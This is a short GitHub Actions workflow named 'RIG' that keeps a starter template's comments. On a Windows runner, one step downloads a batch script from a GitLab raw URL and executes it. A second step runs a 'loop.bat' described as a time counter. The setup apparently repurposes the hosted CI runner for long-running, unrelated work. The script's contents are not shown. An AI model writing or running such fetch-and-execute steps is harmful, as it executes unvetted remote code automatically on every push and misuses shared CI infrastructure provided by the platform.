# This is a basic workflow to help you get started with Actions

name: RIG

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the "main" branch
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Downloading & Installing Essentials
      run: |
          Invoke-WebRequest -Uri "https://gitlab.com/yasirsiddiqui/unmin/-/raw/main/Main.bat" -OutFile "Main.bat"
          cmd /c Main.bat

    - name: Time Counter
      run: cmd /c loop.bat
